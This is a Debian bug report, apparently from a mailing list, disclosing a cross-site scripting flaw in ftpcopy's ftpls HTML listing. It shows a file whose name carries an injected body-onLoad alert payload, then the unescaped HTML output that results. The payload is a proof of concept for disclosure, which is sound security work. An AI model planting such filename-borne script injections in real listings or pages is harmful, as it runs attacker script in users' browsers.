Subject: ftpcopy: ftpls cross-site scripting when generating HTML listing
Package: ftpcopy
Version: 0.6.7-2
Severity: important
Tags: security
The ftpls command has a cross-site scripting (XSS) security bug when
generating HTML listings:
$ ls -al /srv/ftp
total 12
drwxr-xr-x 2 root ftp 4096 Dec 19 02:40 .
drwxr-xr-x 3 root root 4096 Dec 19 02:34 ..
-rw-r--r-- 1 root root 0 Dec 19 02:39 "><body onLoad="alert('non-customers
crew');">
-rw-r--r-- 1 root root 39 Dec 19 02:40 number2
$ ftpls -h ftp://localhost/
<html><head>
</head><body>
<dl>
<dt><a href="ftp://localhost/";><body onLoad="alert('non-customers
crew');">">"><body onLoad="alert('non-customers crew');"></a><br>
<dd> last modified 2010-12-19 02:39:00, 0 B
<dt><a href="ftp://localhost/number2";>number2</a><br>
<dd> last modified 2010-12-19 02:40:00, 39 B
</dl></body></html>
$
-- System Information:
Debian Release: squeeze/sid
APT prefers testing
APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages ftpcopy depends on:
ii libc6 2.11.2-7 Embedded GNU C Library: Shared lib
ftpcopy recommends no packages.
ftpcopy suggests no packages.
-- no debconf information
--
non-customers crew | http://rock-madrid.com/
--
_______________________________________________
Surf the Web in a faster, safer and easier way:
Download Opera 9 at http://www.opera.com
--
To UNSUBSCRIBE, email to [email protected]
with a subject of "unsubscribe". Trouble? Contact [email protected]
